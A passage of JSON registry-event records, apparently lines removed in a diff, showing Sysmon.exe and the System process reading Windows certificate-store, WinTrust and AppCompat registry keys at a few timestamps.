2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll", - "registry_value": "clr.dll", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 4, - "process_name": "System", - "process_path": "System", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\CIT\\Module\\Microsoft.NET/Framework/v4.0.30319/clr.dll\\\\Device\\HarddiskVolume1\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe", - "registry_value": "RegAsm.exe", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-B282-5C05-0000-0010EB030000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570866530000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570867310016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 